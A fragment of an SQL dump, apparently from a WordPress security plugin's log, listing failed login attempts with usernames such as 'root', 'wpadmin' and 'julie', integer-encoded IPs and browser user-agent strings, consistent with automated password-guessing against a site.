(99911, 1493945956.532300, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99912, 1493945958.638293, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99913, 1493945960.474289, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99914, 1493947695.484293, 1, 'loginFailInvalidUsername', 'guest', 0, 3497113622, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99915, 1493948313.146611, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99916, 1493948314.958927, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99917, 1493948316.814452, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99918, 1493948318.633935, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99919, 1493948320.503892, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99920, 1493948322.349791, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99921, 1493948324.236955, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99922, 1493948326.058696, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99923, 1493948327.893002, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99924, 1493948329.881646, 1, 'loginFailInvalidUsername', 'root', 0, 1500280334, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99925, 1493949432.256547, 1, 'loginFailInvalidUsername', 'root', 0, 3497110456, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99926, 1493949613.961594, 1, 'loginFailInvalidUsername', 'cross@cross', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99927, 1493949630.089184, 1, 'loginFailInvalidUsername', 'objectifs@objectifs', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99928, 1493949636.261092, 1, 'loginFailInvalidUsername', 'venez@venez', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99929, 1493949648.749821, 1, 'loginFailInvalidUsername', 'outils@outils', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99930, 1493949661.031952, 1, 'loginFailInvalidUsername', 'professionnel@professionnel', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99931, 1493949669.153464, 1, 'loginFailInvalidUsername', 'travail@travail', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99932, 1493949680.864752, 1, 'loginFailInvalidUsername', 'namur@namur', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99933, 1493949686.179243, 1, 'loginFailInvalidUsername', 'center@center', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99934, 1493949689.494672, 1, 'loginFailInvalidUsername', 'test', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99935, 1493949694.675891, 1, 'loginFailInvalidUsername', 'support', 0, 3326599595, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99936, 1493950762.081550, 1, 'loginFailInvalidUsername', 'support', 0, 3590043250, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99937, 1493951328.746234, 1, 'loginFailInvalidUsername', 'support', 0, 3191614634, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99938, 1493973957.096794, 1, 'loginFailValidUsername', 'admin', 1, 1600667040, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99939, 1493992796.583886, 1, 'loginFailValidUsername', 'julie', 2, 1589499159, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.94.47 (KHTML, like Gecko) Chrome/57.4.0522.5894 Safari/534.54 OPR/40.6.1345.6617'),
(99940, 1493994800.586596, 1, 'loginFailValidUsername', 'julie', 2, 2033590441, 'Mozilla/5.0 (Windows NT 6.1; Win64) AppleWebKit/530.64.01 (KHTML, like Gecko) Chrome/55.0.5267.0995 Safari/531.94 OPR/41.9.3544.8272'),
(99941, 1494002864.051431, 1, 'loginFailValidUsername', 'julie', 2, 2016970575, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.07.55 (KHTML, like Gecko) Chrome/57.5.9664.4392 Safari/534.47'),
(99942, 1494006809.381142, 1, 'loginFailValidUsername', 'julie', 2, 1548974815, 'Mozilla/5.0 (Windows NT 5.0; rv:52.58.05) Gecko/20146722 Firefox/52.58.05'),
(99943, 1494010854.621775, 1, 'loginFailValidUsername', 'julie', 2, 702326185, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.85.48 (KHTML, like Gecko) Chrome/57.4.9773.4945 Safari/534.55 OPR/44.5.1496.6768'),
(99944, 1494014792.131617, 1, 'loginFailValidUsername', 'julie', 2, 1532715696, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_36_89) AppleWebKit/532.84.47 (KHTML, like Gecko) Chrome/57.4.9600.5972 Safari/534.55'),
(99945, 1494018751.390312, 1, 'loginFailValidUsername', 'julie', 2, 2805765009, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.06.53 (KHTML, like Gecko) Chrome/57.5.9435.4163 Safari/534.45'),
(99946, 1494022803.121670, 1, 'loginFailValidUsername', 'julie', 2, 694202782, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/533.99.42 (KHTML, like Gecko) Chrome/57.5.0107.5470 Safari/530.60 OPR/40.6.1920.7292'),
(99947, 1494026894.096061, 1, 'loginFailValidUsername', 'julie', 2, 2955886216, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.66.13 (KHTML, like Gecko) Chrome/55.1.6455.0183 Safari/532.05 OPR/42.9.4632.9360'),
(99948, 1494031052.753435, 1, 'loginFailValidUsername', 'julie', 2, 3306890834, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/536.37.80 (KHTML, like Gecko) Chrome/54.9.4900.9272 Safari/531.98'),
(99949, 1494035509.750622, 1, 'loginFailValidUsername', 'julie', 2, 831990947, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_33_80) AppleWebKit/531.74.21 (KHTML, like Gecko) Chrome/56.1.6278.1906 Safari/532.04 Edge/36.08284'),
(99950, 1494041690.510045, 1, 'loginFailValidUsername', 'julie', 2, 3413169274, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_39_86) AppleWebKit/531.71.28 (KHTML, like Gecko) Chrome/56.2.7932.1660 Safari/532.10 Edge/36.04817'),
(99951, 1494047804.079579, 1, 'loginFailValidUsername', 'julie', 2, 702812100, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.06.59 (KHTML, like Gecko) Version/5.6.1 Safari/532.14'),
(99952, 1494052318.006676, 1, 'loginFailInvalidUsername', 'demo', 0, 1138881296, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99953, 1494052336.261675, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1138881296, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99954, 1494052347.011154, 1, 'loginFailInvalidUsername', 'master', 0, 1138881296, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99955, 1494052347.513118, 1, 'loginFailInvalidUsername', 'DEMO', 0, 3069127338, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99956, 1494052391.552821, 1, 'loginFailInvalidUsername', 'blog', 0, 3346287710, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99957, 1494053830.245488, 1, 'loginFailValidUsername', 'julie', 2, 1588883723, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.27.80 (KHTML, like Gecko) Chrome/54.8.3947.8219 Safari/531.98'),
(99958, 1494059841.816972, 1, 'loginFailValidUsername', 'julie', 2, 3177270844, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.83.36 (KHTML, like Gecko) Chrome/57.4.9536.4808 Safari/534.54 OPR/44.5.0359.6621'),
(99959, 1494060818.352423, 1, 'loginFailInvalidUsername', 'master', 0, 1632245985, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99960, 1494060819.778019, 1, 'loginFailInvalidUsername', 'blog', 0, 3353828771, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99961, 1494060861.286516, 1, 'loginFailInvalidUsername', 'webadmin', 0, 1547660374, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99962, 1494060884.306772, 1, 'loginFailInvalidUsername', 'manager', 0, 3164982411, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99963, 1494061427.092413, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 1138881296, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99964, 1494071427.235854, 1, 'loginFailValidUsername', 'julie', 2, 783298999, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.14.67 (KHTML, like Gecko) Version/4.6.1 Safari/533.22'),
(99965, 1494072414.449278, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 2988470183, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99966, 1494072431.505111, 1, 'loginFailInvalidUsername', 'master', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99967, 1494072575.157223, 1, 'loginFailInvalidUsername', 'blog', 0, 3164982411, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99968, 1494072602.703868, 1, 'loginFailInvalidUsername', 'manager', 0, 469651732, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99969, 1494072996.797938, 1, 'loginFailInvalidUsername', 'DEMO', 0, 469651732, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99970, 1494073769.339412, 1, 'loginFailInvalidUsername', 'master', 0, 2746000698, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99971, 1494073909.463161, 1, 'loginFailInvalidUsername', 'webadmin', 0, 3423600883, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99972, 1494082816.533915, 1, 'loginFailValidUsername', 'julie', 2, 736524348, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.15.62 (KHTML, like Gecko) Chrome/53.6.0353.5081 Safari/534.54'),
(99973, 1494084435.908980, 1, 'loginFailInvalidUsername', 'administrador', 0, 521678460, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99974, 1494084518.839375, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 3164982411, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99975, 1494084554.702483, 1, 'loginFailInvalidUsername', 'DEMO', 0, 3353828771, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99976, 1494084555.817356, 1, 'loginFailInvalidUsername', 'DEMO', 0, 843039290, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99977, 1494084556.105502, 1, 'loginFailInvalidUsername', 'DEMO', 0, 2988470183, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99978, 1494084556.107845, 1, 'loginFailInvalidUsername', 'DEMO', 0, 633031051, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99979, 1494084559.957282, 1, 'loginFailInvalidUsername', 'DEMO', 0, 3527006264, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99980, 1494084560.176516, 1, 'loginFailInvalidUsername', 'DEMO', 0, 1728523225, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99981, 1494084560.434888, 1, 'loginFailInvalidUsername', 'DEMO', 0, 2655384544, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99982, 1494084572.357210, 1, 'loginFailInvalidUsername', 'DEMO', 0, 1729883369, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99983, 1494084889.689943, 1, 'loginFailInvalidUsername', 'demo', 0, 3423600883, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99984, 1494084893.804751, 1, 'loginFailInvalidUsername', 'webadmin', 0, 3098024844, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99985, 1494084900.596664, 1, 'loginFailInvalidUsername', 'blog', 0, 1632276610, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99986, 1494087976.585326, 1, 'loginFailInvalidUsername', 'support', 0, 3237666864, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99987, 1494088406.964566, 1, 'loginFailValidUsername', 'julie', 2, 2631043064, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.74.11 (KHTML, like Gecko) Chrome/55.1.6297.1925 Safari/532.03 OPR/42.0.4574.9202'),
(99988, 1494093909.450334, 1, 'loginFailValidUsername', 'julie', 2, 1835647128, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.62.19 (KHTML, like Gecko) Chrome/55.1.6017.0745 Safari/532.01 OPR/42.9.4394.9022'),
(99989, 1494100230.683549, 1, 'loginFailInvalidUsername', 'superadmin', 0, 2988470183, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99990, 1494100234.433749, 1, 'loginFailInvalidUsername', 'blog', 0, 521678460, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99991, 1494100238.353071, 1, 'loginFailInvalidUsername', 'webadmin', 0, 2111103174, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99992, 1494100303.376554, 1, 'loginFailInvalidUsername', 'manager', 0, 3527006264, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99993, 1494102644.458298, 1, 'loginFailInvalidUsername', 'superadmin', 0, 762746819, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99994, 1494110570.355255, 1, 'loginFailValidUsername', 'julie', 2, 1776344316, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_41_94) AppleWebKit/533.09.52 (KHTML, like Gecko) Chrome/57.5.1159.6421 Safari/530.60 Edge/34.76004'),
(99995, 1494116196.474691, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 3098029782, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99996, 1494116197.767935, 1, 'loginFailInvalidUsername', 'master', 0, 3098024846, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99997, 1494116208.549576, 1, 'loginFailInvalidUsername', 'manager', 0, 3069127338, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99998, 1494116335.172593, 1, 'loginFailInvalidUsername', 'webadmin', 0, 3346287710, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(99999, 1494116344.265542, 1, 'loginFailInvalidUsername', 'blog', 0, 2727364316, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100000, 1494119049.698186, 1, 'loginFailInvalidUsername', 'webadmin', 0, 2727364316, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100001, 1494122500.296181, 1, 'loginFailValidUsername', 'julie', 2, 3176824475, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.25.78 (KHTML, like Gecko) Chrome/54.8.3701.8073 Safari/531.96'),
(100002, 1494128708.762605, 1, 'loginFailValidUsername', 'julie', 2, 1429722213, 'Mozilla/5.0 (Windows NT 6.0; rv:45.67.14) Gecko/20155554 Firefox/45.67.14'),
(100003, 1494133332.100216, 1, 'loginFailInvalidUsername', 'demo', 0, 3527006264, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100004, 1494133399.840991, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 1893028934, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100005, 1494134009.173818, 1, 'loginFailInvalidUsername', 'wordpress', 0, 633031051, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100006, 1494134024.812388, 1, 'loginFailInvalidUsername', 'DEMO', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100007, 1494134108.280197, 1, 'loginFailInvalidUsername', 'webadmin', 0, 1743622318, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100008, 1494134132.271488, 1, 'loginFailInvalidUsername', 'blog', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100009, 1494134870.004371, 1, 'loginFailValidUsername', 'julie', 2, 1589189838, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/534.01.58 (KHTML, like Gecko) Chrome/57.4.9934.4662 Safari/534.40'),
(100010, 1494135260.069257, 1, 'loginFailInvalidUsername', 'DEMO', 0, 762746819, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100011, 1494140532.325843, 1, 'loginFailValidUsername', 'admin', 1, 2249451241, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100012, 1494147061.155588, 1, 'loginFailValidUsername', 'julie', 2, 762636554, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_43_96) AppleWebKit/533.92.45 (KHTML, like Gecko) Chrome/57.5.0488.5750 Safari/530.63 Edge/34.69383'),
(100013, 1494149308.834807, 1, 'loginFailInvalidUsername', 'superadmin', 0, 2727364316, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100014, 1494149331.095185, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 2996829330, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100015, 1494150065.787566, 1, 'loginFailInvalidUsername', 'manager', 0, 3098024781, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100016, 1494152889.648181, 1, 'loginFailValidUsername', 'julie', 2, 3004752202, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_33_80) AppleWebKit/531.74.21 (KHTML, like Gecko) Chrome/56.2.7373.1001 Safari/532.14 Edge/36.08222'),
(100017, 1494158601.121114, 1, 'loginFailValidUsername', 'julie', 2, 1335791119, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_39_82) AppleWebKit/532.98.41 (KHTML, like Gecko) Chrome/57.5.0087.5359 Safari/534.59 Edge/34.65377'),
(100018, 1494164213.416752, 1, 'loginFailValidUsername', 'julie', 2, 2374659752, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.22.75 (KHTML, like Gecko) Chrome/54.8.3428.8790 Safari/531.92'),
(100019, 1494167247.364136, 1, 'loginFailInvalidUsername', 'master', 0, 1053997316, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100020, 1494167247.573479, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1138881296, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100021, 1494167251.769648, 1, 'loginFailInvalidUsername', 'manager', 0, 3056763559, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100022, 1494167288.759360, 1, 'loginFailInvalidUsername', 'blog', 0, 3098029701, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100023, 1494167359.551169, 1, 'loginFailInvalidUsername', 'webadmin', 0, 3423600883, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100024, 1494167956.003882, 1, 'loginFailInvalidUsername', 'manager', 0, 2202594575, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100025, 1494169647.123884, 1, 'loginFailInvalidUsername', 'webmaster', 0, 2996829330, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100026, 1494169790.128681, 1, 'loginFailValidUsername', 'julie', 2, 3035978418, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/535.13.76 (KHTML, like Gecko) Chrome/53.7.2578.8840 Safari/531.84'),
(100027, 1494171372.331679, 1, 'loginFailInvalidUsername', 'master', 0, 2746000698, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100028, 1494173321.818524, 1, 'loginFailInvalidUsername', 'admin@crosstrainingcenter.be', 0, 3191614634, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100029, 1494173771.118805, 1, 'loginFailValidUsername', 'julie', 2, 3398341290, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_24_71) AppleWebKit/531.75.22 (KHTML, like Gecko) Chrome/55.1.6411.1149 Safari/532.05 Edge/36.09608'),
(100030, 1494173862.945451, 1, 'loginFailInvalidUsername', 'tester', 0, 794439728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100031, 1494174197.959115, 1, 'loginFailInvalidUsername', 'tester', 0, 1279978460, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100032, 1494174663.862391, 1, 'loginFailInvalidUsername', 'notre', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100033, 1494181869.152854, 1, 'loginFailValidUsername', 'julie', 2, 2684304397, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.29.72 (KHTML, like Gecko) Chrome/54.8.3111.8483 Safari/531.90'),
(100034, 1494184749.463442, 1, 'loginFailInvalidUsername', 'DEMO', 0, 1578617924, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100035, 1494184792.539922, 1, 'loginFailInvalidUsername', 'webadmin', 0, 2727364316, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100036, 1494184828.271319, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 3069127338, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100037, 1494186058.662050, 1, 'loginFailInvalidUsername', 'demo', 0, 3056763559, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100038, 1494186073.295562, 1, 'loginFailInvalidUsername', 'wordpress', 0, 3098029701, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100039, 1494188238.472523, 1, 'loginFailValidUsername', 'julie', 2, 3307252610, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.82.44 (KHTML, like Gecko) Chrome/57.4.9356.4628 Safari/534.52 OPR/44.5.1179.6441'),
(100040, 1494194434.261028, 1, 'loginFailValidUsername', 'julie', 2, 3321294843, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.75.12 (KHTML, like Gecko) Chrome/55.1.6460.1198 Safari/532.05 OPR/42.0.4647.9375'),
(100041, 1494203478.804859, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1833311020, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100042, 1494203485.619958, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 2746000698, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100043, 1494203508.048955, 1, 'loginFailInvalidUsername', 'manager', 0, 3423600883, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100044, 1494203540.366643, 1, 'loginFailInvalidUsername', 'blog', 0, 3098024843, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100045, 1494203699.293524, 1, 'loginFailInvalidUsername', 'webadmin', 0, 2111103174, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100046, 1494204311.809761, 1, 'loginFailInvalidUsername', 'superadmin', 0, 762746819, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100047, 1494204322.763654, 1, 'loginFailInvalidUsername', 'wpadmin', 0, 3527006264, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100048, 1494204458.009382, 1, 'loginFailInvalidUsername', 'blog', 0, 3164982411, 'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0'),
(100049, 1494207259.856253, 1, 'loginFailValidUsername', 'julie', 2, 831573078, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_43_96) AppleWebKit/533.92.55 (KHTML, like Gecko) Chrome/57.5.0497.6769 Safari/530.63 Edge/34.68478'),
(100050, 1494213890.773217, 1, 'loginFailValidUsername', 'julie', 2, 2631829816, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.14.61 (KHTML, like Gecko) Chrome/53.6.1285.5913 Safari/534.54'),
